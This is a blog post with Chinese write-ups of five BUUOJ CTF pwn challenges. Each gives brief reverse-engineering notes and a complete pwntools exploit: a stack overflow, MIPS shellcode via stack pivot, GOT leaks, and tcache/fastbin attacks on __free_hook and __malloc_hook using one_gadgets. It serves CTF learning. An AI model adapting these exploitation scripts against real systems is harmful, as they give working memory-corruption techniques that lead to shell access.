buuoj Pwn writeup 216-220

最新推荐文章于 2023-12-14 20:29:29 发布
最新推荐文章于 2023-12-14 20:29:29 发布
阅读量477 收藏 1
点赞数 1
分类专栏: CTF 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yongbaoii/article/details/119091353
版权

216 hwb2018_gettingstart

在这里插入图片描述
在这里插入图片描述
溢出覆盖就好,唯一有个浮点数,网上网站一大把,找一个转换一下就好。

exp

from pwn import *

context(log_level='debug')

r=remote("node4.buuoj.cn","25539")

r.recv()

v7=0x7FFFFFFFFFFFFFFF
v8=0x3FB999999999999A

payload='a'*0x18+p64(v7)+p64(v8)

r.send(payload)

r.recv()

r.interactive()

217 axb_2019_mips

在这里插入图片描述看这题目,一道mips。
但是其实保护一点没开。

IDA反编译不了,我也懒得下载ghidra,汇编好像不多,直接读汇编吧。

mips的函数调用规则其实看这四句汇编就够了。
在这里插入图片描述addiu就是加
sw就是把寄存器里的值放到对应寄存器的偏移处。

这四句话啥意思。
首先sp寄存器-0x38.就是新开了栈。
把ra寄存器,也就是返回地址的值放到sp寄存器加0x30+4的地方。
把fp寄存器,也就是栈底指针寄存器的值放到sp寄存器加0x30的地方。
然后fp寄存器更新为sp寄存器的值。

一会变量啥的都是用fp寄存器去寻找。

一共三个函数,第一个是main,第二个是vuln,还有一个专门的gadget函数。

首先看main
在这里插入图片描述一进来首先是alarm函数跟三个setbuf函数。平平无奇。

在这里插入图片描述
两个输出跟一个输入函数。
输入看的出来开的栈大小是0x18,因为addiu是加法指令,$fp可以理解成ebp寄存器。

在这里插入图片描述
然后就是一句输出并且进入了vuln函数。

在这里插入图片描述这个函数里面有个输入,明显看到栈开了0x20,然后可以输入0x200.
所以栈溢出我们研究怎样突破它

因为没有开NX,所以我们其实可以直接ret2shellcode,栈迁移来做。
不可以ret2libc,因为没有给libc。

所以就栈迁移到bss上,然后ret2shellcode一套带走就好了。
栈迁移呢做的是我们不太常见的那种,因为只有一次read的机会,所以我们返回地址必须填写带read的函数。但是如果直接写vuln函数,vuln在开始时会有一段开栈的操作,这一下会再把$fp带回来,所以我们只能从这个函数一半read函数处截胡。读shellcode到bss上,然后写好返回地址就可以了。

exp

# -*- coding: utf-8 -*-
from pwn import *

r = remote('node4.buuoj.cn',27128)
 
bss = 0x410b70
read_addr = 0x4007e0
r.sendafter("What's your name:","YOngibaoi")
 
shellcode = asm(shellcraft.mips.linux.sh(),arch='mips')

payload = 'a'*0x20
payload += p32(bss + 0x200 - 0x40 + 0x28)
#bss往下拉了0x200,防止一会输入影响bss上面正常内容
payload += p32(read_addr)
 
r.send(payload)
 
sleep(1)
payload = 'a'*0x24

payload += p32(bss + 0x200 + 0x28)
payload += shellcode
r.send(payload)
 
r.interactive()

218 铁人三项(第五赛区)_2018_breakfast

在这里插入图片描述crea
在这里插入图片描述结构还是比较简单的,都在bss上。
ptr指针,最多100个chunk,然后先是100个addr,又跟着100个size。

modify
在这里插入图片描述就是用来往里面读内容。

ver
在这里插入图片描述就是输出
我看半天,我发现这个write不大对劲。
它输出的不是我们平常的“内容”,而实[内容]。

libera
在这里插入图片描述显然有uaf。

因为show的原因,本来可以直接释放八个chunk然后泄露,但是这个就直接read进去got表的地址,write出来就可以泄露。

然后劫持free_hook就好了。

exp

from pwn import *

context.log_level = "debug"

r = remote("node4.buuoj.cn","26075")
#r = process("./218")

elf = ELF('./218')
libc = ELF('./64/libc-2.27.so')

def create(pos,size):
    r.sendlineafter('5.- Exit', "1")
    r.sendlineafter('Enter the position of breakfast', str(pos))
    r.sendlineafter('Enter the size in kcal.', str(size))

def read(index, context): 
    r.sendlineafter('5.- Exit', "2")
    r.sendlineafter('Introduce the menu to ingredients', str(index))
    r.sendlineafter('Enter the ingredients', context)

def write(index): 
    r.sendlineafter('5.- Exit', "3")
    r.sendlineafter('Enter the breakfast to see', str(index))
    

def delete(index):
    r.sendlineafter('5.- Exit', "4")
    r.sendlineafter('Introduce the menu to delete', str(index))

write_got = elf.got['write']

create(1, 8)
read(1, p64(write_got))

write(1)
write_addr = u64(r.recvuntil("\x7f")[-6:].ljust(8, "\x00"))
libc_base = write_addr - libc.sym['write']
free_hook = libc_base + libc.sym['__free_hook']
system_addr = libc_base + libc.sym['system']
print "libc_base = " + hex(libc_base)

create(1, 96)
create(2, 96)
read(2, "/bin/sh\x00")
 
delete(1)
 
read(1, p64(free_hook))

create(1, 96)
create(1, 96)

#gdb.attach(r)

read(1, p64(system_addr))
delete(2)

r.interactive()

219 ciscn_2019_sw_7

在这里插入图片描述add
在这里插入图片描述最多十个chunk。
size最大0x60.
申请到的chunk会自动多加8个,前八个字节存放size。
然后chunk地址会放在bss数组中。
会把地址最后一个半字节输出出来,不知道有啥用。

我们发现,这里的size没有限制我们能不能输入0或者负数
经过我们看那个输入函数的时候,我们看到size输入0的时候会造成溢出。

show
在这里插入图片描述输出也是平平无奇的。

没有edit

free
在这里插入图片描述
那么其实我们这个题目可以利用的只有那个溢出。

那么溢出我们首先要考虑去泄露地址,大小限定了不能大于0x60,所以我们没有机会去将chunk挂在unsorted bin中。
我们需要通过溢出构造一个比较大的chunk,但是我们问题又来了,我们需要攻击tcache的头,不然还是挂不进去。

所以我们就首先通过溢出,通过爆破,来攻击表头,将chunk挂进unsorted bin中,再泄露地址,相同手法攻击malloc_hook就可以了。
当然free_hook啥的都可以。

exp

#coding:utf8
from pwn import *

libc = ELF('./64/libc-2.27.so')
 
def add(size,content):
   r.sendlineafter('>','1')
   r.sendlineafter('The size of note:',str(size))
   r.sendlineafter('The content of note:',content)
 
def show(index):
   r.sendlineafter('>','2')
   r.sendlineafter('Index:',str(index))
 
def delete(index):
   r.sendlineafter('>','4')
   r.sendlineafter('Index:',str(index))
 
def exp():
   add(0,'a')
   add(0x50,'b')
   add(0,'c')
   add(0x50,'d')
   add(0x50,'e')
   delete(4)
   delete(3)
   delete(2)
   add(0,'c'*0x8 + p64(0) + p64(0x61) + p8(0x1B - 8)) #2
   add(0x50,'d') #3
   add(0x50,'\x00' + p8(0xFF)) #4
   payload = 'a'*0x8 + p64(0) + p64(0x60 + 0x20 + 0x61)
   delete(0)
   add(0,payload) #0
   delete(1)
   add(0x20,'b') #1
   add(0x20,'b') #5
   show(2)
   r.recvuntil('2 : ')
   malloc_hook = (u64(r.recv(6).ljust(8,'\x00')) & 0xFFFFFFFFFFFFF000) + (libc.symbols['__malloc_hook'] & 0xFFF)
   libc_base = malloc_hook - libc.symbols['__malloc_hook']
   if libc_base >> 40 != 0x7F:
      raise Exception('error leak!')
   one_gadget = libc_base + 0x10a38c
   print 'libc_base=',hex(libc_base)

   #3放入tcache bin
   delete(3)
   add(0x60,'c'*0x18 + p64(malloc_hook-0x8)) #3
   add(0x50,'c')
   add(0x50,p64(one_gadget))

   r.sendlineafter('>','1')
   r.sendlineafter('The size of note:','1')
 
while True:
   try:
      global r
      r = remote('node4.buuoj.cn',29019)
      exp()
      r.interactive()
   except:
      r.close()
      print 'trying...'

220 gwctf_2019_chunk

在这里插入图片描述
add
在这里插入图片描述
最多十个chunk,大小也不能太大。

show
在这里插入图片描述show就是普通show

delete
在这里插入图片描述
也就是free。也清空了。

edit
在这里插入图片描述平平无奇edit

漏洞在何方。
原来它把它的输入函数叫了个read_0,我一直以为是read。

看看read_0
在这里插入图片描述
显然有个off by null。

所以我们就off by null制造overlap,因为ubuntu16,攻击malloc_hook就好。

exp

# -*- coding: utf-8 -*-
from pwn import*

context.log_level = "debug"

#r =process("./220")
r = remote("node4.buuoj.cn", "28020")

elf = ELF('./220')
libc = ELF("./64/libc-2.23.so")

def add(index, size):
    r.sendlineafter("Your choice: ", "1")
    r.sendlineafter("Give me a book ID: ", str(index))
    r.sendlineafter("how long: ", str(size))

def free(index):
    r.sendlineafter("Your choice: ", "3")
    r.sendlineafter("Which one to throw?\n", str(index))

def edit(index, content):
    r.sendlineafter("Your choice: ", "4")
    r.sendlineafter("Which book to write?", str(index))
    r.sendafter("Content: ", content)  #这个地方也要用send.

def show(index):
    r.sendlineafter("Your choice: ", "2")
    r.sendlineafter("Which book do you want to show?", str(index))

add(0, 0xf8) #0
add(1, 0x68) #1
add(2, 0xf8) #2
add(3, 0x10) #3
free(0)
edit(1, "a" * 0x60 + p64(0x170))
free(2)
add(0, 0xf8) #0
show(1)
malloc_hook = (u64(r.recvuntil('\x7f')[-6:].ljust(8, "\x00")) & 0xFFFFFFFFFFFFF000) + (libc.sym['__malloc_hook'] & 0xFFF)
libc_base = malloc_hook - libc.sym['__malloc_hook']
realloc = libc_base + libc.sym['realloc']
one_gadget = libc_base + 0x4526a
print "libc_base = " + hex(libc_base)

add(4, 0x68) #4
free(4)
edit(1, p64(malloc_hook - 0x23) + '\n')
add(4, 0x68) #5
add(5, 0x68) #6
edit(5, 'a' * 0xb + p64(one_gadget) + p64(realloc + 13) + '\n')



add(7, 0x88) #success!

r.interactive()




'''
0x45216 execve("/bin/sh", rsp+0x30, environ)
constraints:
  rax == NULL

0x4526a execve("/bin/sh", rsp+0x30, environ)
constraints:
  [rsp+0x30] == NULL

0xf02a4 execve("/bin/sh", rsp+0x50, environ)
constraints:
  [rsp+0x50] == NULL

0xf1147 execve("/bin/sh", rsp+0x70, environ)
constraints:
  [rsp+0x70] == NULL
'''
yongbaoii
关注
专栏目录
BUUCTF_WriteUp 2021-08-23
m0_56897090的博客
08-23 372
2021-08-23 文章目录2021-08-23shell_asm题目描述题目分析BabyROP题目描述解题思路0x01 整体思路0x02 额外前置知识:0x03 expnot_the_same_3dsctf_20160x01 解题思路0x02 expBJDCTF-babystack0x01 解题思路0x02 Expjarvisoj_level20x01 整体分析0x02 exp32位0x03 64位解法get_started_3dsctf_20160x01 程序整体分析预期解法解法2:mprotectc
初学pwn-BUUCTF(ciscn_2019_n_1)
天柱的博客
08-31 631
初学pwn-writeUp BUUCTF的第四道题,ciscn-2019_n_1。 首先还是链接远端查看一下。 这里提示让猜一个数字,然后他告诉我们,这个数字应该是11.28125。这就有点掩耳盗铃了呀,但是输入了11.28125,还是在说应该输入11.28125。可能是有点问题,ida打开查看一下。 可以看到主函数里,调用了三个函数,前两个都是set某个值,我们直接看func函数。 那这就很明显了,刚刚输入的值赋给了v1,但是这里是要让v2的值等于11.28125才可以。查看一下地址。 嗯,跟想象
buuoj re逆向49-64题writeup(截图+c++源码+过程).doc
12-31
文章上传不了,用word的形式上传,buuoj re 逆向49-64题writeup(截图+c++源码+过程)
buuoj Pwn writeup 96-100
yongbaoii的博客
03-08 325
96 mrctf2020_easy_equation 保护 97 ciscn_2019_final_2 保护 98 ciscn_2019_s_9 保护 99 gyctf_2020_force 保护 100 [极客大挑战 2019]Not Bad 保护
buuoj Pwn writeup 66-70
yongbaoii的博客
02-23 285
66 ciscn_2019_final_3 保护 67 mrctf2020_shellcode 保护 68 hitcontraining_magicheap 保护 69 pwnable_start 保护 70 wustctf2020_getshell_2 保护
buuoj Pwn writeup 76-80
yongbaoii的博客
02-24 419
76 0ctf_2017_babyheap 保护 菜单堆。 allocate 堆的结构很明显了。要注意的是flag是四个字节。 fill 又是输入大小可以随便写。 又可以溢出。 free free的还是很干净的。 dump 平平无奇输出函数。 那么我们首先要考虑泄露libc的地址。泄露地址的方法只能去考虑unsorted bin,因为有溢出,可以完全仿照off by one,来制造overlapping,然后泄露地址啊,攻击malloc_hook,就下来了。 先来申请四个chunk。然后通过栈溢出改变c
buuoj Pwn writeup 56-60
yongbaoii的博客
02-16 234
56 wustctf2020_getshell 保护 57 [V&N2020 公开赛]easyTHeap 保护 58 xdctf2015_pwn200 保护 59 ciscn_2019_n_3 保护 60 bbys_tu_2016 保护
初学pwn-BUUCTF(rip)
天柱的博客
08-30 2528
初学pwn-writeUp BUUCTF平台的一道题目,rip。 与之前同样的步骤,启动靶机,链接远端 发现这里提示输入一些内容,但是输入完成之后,这里就结束了。还是要打开文件查看一下。 看到这里,只有一个输入的过程可以操作,那就很清楚了,就是要栈溢出了。点进去看一下。 可以看到这里s这个数组是15个字节,到r这个返回值还需要8个字节。不过这里要注意的一点是,这个15是十进制的,不能像之前再在数字之前加0x标记十六进制,这里可以直接写十进制。 摁shift+f12,可以看到这时还有什么地址可能会用到,
初学pwn-攻防世界(level0)
天柱的博客
08-27 1015
初学pwn-writeUp 攻防世界的第三道题目,level0。 首先还是先创建场景,使用nc进入远端,发现输出了一个Hello,World,之后什么都没有了,使用ls也没有反应,说明这需要我们获取shell了。 下载文件,先用checksec查看一下 这里简单介绍一些checksec这个工具: 1、Relro:No Relro(重定位表只读)   Relocation Read Only, 重定位表只读。重定位表即.got 和 .plt 两个表。   RELRO会有No RELRO、Partial RE
2021-09-20 BUUCTF WriteUP(堆/字符串/栈)
m0_56897090的博客
09-20 622
文章目录堆类综合模型总结pwnable_hacknote分析EXPhitcontraining_bamboobox分析EXPnpuctf_2020_easyheap分析EXPciscn_2019_es_1分析EXPhitcontraining_unlink分析EXPgyctf_2020_some_thing_exceting分析EXP栈溢出综合模型总结picoctf_2018_shellcode分析EXPjarvisoj_level5分析EXPcmcc_pwnme2分析EXPactf_2019_babyst
buuoj Pwn writeup 221-225
yongbaoii的博客
08-31 923
221 starctf2018_babystack 222 xm_2019_awd_pwn2 223 jarvisoj_level6 224 hctf2018_the_end 225 inndy_onepunch
buuoj Pwn writeup 156-160
yongbaoii的博客
05-28 406
156 就是64位orw的shellcode 说的很明白 # -*- coding: utf-8 -*- from pwn import * context.log_level = "debug" context.arch = "amd64" r = remote("node3.buuoj.cn",29063) #r = process("./pwnn") shellcode = shellcraft.open('./flag') shellcode += shellcraft.read(3,0x4
mips&arm&aarch64-pwn初探
seaaseesa的博客
04-02 4872
mips&arm&aarch64-pwn初探 前言 厌倦了x86/x64 平台下的二进制漏洞利用,来看看mips/arm平台下的pwn是如何达到利用的。众所周知,mips/arm架构cpu主要用于嵌入式设备,比如路由器这些。当我们在x86/x64平台练习到一定境界后,再去探索一个新的平台下的漏洞利用,我们可以借鉴以前的方法,总之,思想都是一样的。只不过是指令的样子不同而已。 ...
axb_2019_brop64
qq_62887641的博客
10-03 184
64位,只开了NX程序很简单,有一点点花里胡哨,看到栈溢出,看一下有没有坑点(x。
BUUCTF)gwctf_2019_chunk
最新发布
xy1458214551的博客
12-14 57
BUUCTF的gwctf_2019_chunk题解
[ctfhub.pwn] 第12-14题
weixin_52640415的博客
09-06 1128
ctfhub.pwn习题集
[GWCTF 2019]枯燥的抽奖
记录学习,一起进步
01-26 558
[GWCTF 2019]枯燥的抽奖
[BUUCTF]REVERSE——[GWCTF 2019]re3
mcmuyanga的博客
03-04 1264
[GWCTF 2019]re3 附件 步骤 64位程序,无壳儿,直接用ida打开,首先是检索程序里的字符串 根据correct跳转去找到有关flag的函数,下面能看到ABC……*/,猜测程序里存在base64加密 这边没法f5,估计是jz的锅影响了ida的正常运行,先看一下上面的main函数 main() 输入的字符串长度为32位,利用mprotect函数将dword_400000处的0xF000长度地址修改成了可读可写可执行,sub_402219()里的数据进行了异或处理。 可以看到sub_402
axb_2019_fmt32
、moddemod
07-19 843
exp from pwn import * context.log_level = 'debug' def debug_pause(): log.info(proc.pidof(p)) pause() proc_name = './axb_2019_fmt32' # p = process(proc_name) p = remote('node3.buuoj.cn', 27478) elf = ELF(proc_name) read_got = elf.got['read'..
攻防世界pwn-forgot
08-10
- *1* [攻防世界pwn题:forgot](https://blog.csdn.net/m0_62396648/article/details/125134327)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值